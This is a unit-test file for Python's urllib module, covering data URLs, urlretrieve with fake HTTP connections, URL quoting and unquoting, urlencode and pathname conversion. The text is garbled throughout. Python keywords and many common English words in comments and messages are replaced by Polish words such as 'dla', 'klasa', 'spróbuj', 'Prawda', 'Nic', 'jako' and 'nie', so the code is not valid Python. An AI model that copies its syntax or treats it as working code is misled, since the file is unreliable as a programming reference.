self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such jako "\n", " ", "%0A", oraz "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
dla attr w ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertPrawda(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
klasa urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to make sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
spróbuj:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
w_końcu:
spróbuj: FILE.close()
wyjąwszy: dalej
def tearDown(self):
# Delete the temporary files.
dla each w self.tempFiles:
spróbuj: os.remove(each)
wyjąwszy: dalej
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
spróbuj:
filePath.encode("utf-8")
wyjąwszy UnicodeEncodeError:
podnieś unittest.SkipTest("filePath jest nie encodable to utf8")
zwróć "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file dla deletion during the test fixture tear down, oraz
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
spróbuj:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
w_końcu:
spróbuj: newFile.close()
wyjąwszy: dalej
zwróć newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did nie get a email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertPrawda(os.path.exists(second_temp), "copy of the file was nie "
"made")
FILE = open(second_temp, 'rb')
spróbuj:
text = FILE.read()
FILE.close()
w_końcu:
spróbuj: FILE.close()
wyjąwszy: dalej
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" jest established oraz once when the block jest
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" jest established, once dla the next 8192
# bytes, oraz once dla the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
klasa urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
dalej
przy self.assertRaises(urllib.error.ContentTooShortError):
spróbuj:
urllib.request.urlretrieve('http://example.com/',
reporthook=_reporthook)
w_końcu:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
przy self.assertRaises(urllib.error.ContentTooShortError):
spróbuj:
urllib.request.urlretrieve('http://example.com/')
w_końcu:
self.unfakehttp()
klasa QuotingTests(unittest.TestCase):
"""Tests dla urllib.quote() oraz urllib.quote_plus()
According to RFC 2396 (Uniform Resource Identifiers), to escape a
character you write it jako '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does nie matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning w URIs oraz must be escaped jeżeli nie being used for
their special meaning
Data characters : letters, digits, oraz "-_.!~*'()"
Unreserved oraz do nie need to be escaped; can be, though, jeżeli desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use w URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is the default value for the 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) dla num w range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
dla char w should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, nie %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, nie %s" %
(char, hexescape(char), result))
usuń should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise a TypeError on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with None (default)
result = urllib.parse.quote(given, encoding=Nic, errors=Nic)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
klasa UnquotingTests(unittest.TestCase):
"""Tests dla unquote() oraz unquote_plus()
See the doc string dla quoting_Tests dla details on quoting oraz such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
dla num w range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
usuń escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): nie all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, Nic)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
przy support.check_warnings(('', BytesWarning), quiet=Prawda):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, Nic)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when there are non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=Nic, errors=Nic)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
klasa urlencode_Tests(unittest.TestCase):
"""Tests dla urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method dla testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee oraz
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
dla expected w expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s nie found w %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertPrawda(on_amp_left.isdigit() oraz on_amp_right.isdigit(),
"testing %s: '&' nie located w proper place w %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict jako input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples jako input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for the 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, Prawda)
dla value w given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=Nic", urllib.parse.urlencode({"a": Nic}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, Prawda))
self.assertEqual("a=Nic&a=a",
urllib.parse.urlencode({"a": [Nic, "a"]}, Prawda))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, Prawda))
def test_urlencode_encoding(self):
# ASCII encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
# ASCII Encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=Prawda,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, Prawda,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, Prawda)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, Prawda)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, Prawda, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, Prawda, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, Prawda)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, Prawda)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as a safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=Prawda, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in a sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, Prawda, safe=":$")
self.assertEqual(expect, result)
# Test all of the above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=Prawda, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, Prawda, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
klasa Pathname_Tests(unittest.TestCase):
"""Test pathname2url() oraz url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
dla url w given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
klasa Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions w the urllib."""
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
klasa URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
klasa DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
zwróć url
przy support.check_warnings(
('DummyURLopener style of invoking requests jest deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test that the safe characters are not quoted by urlopen
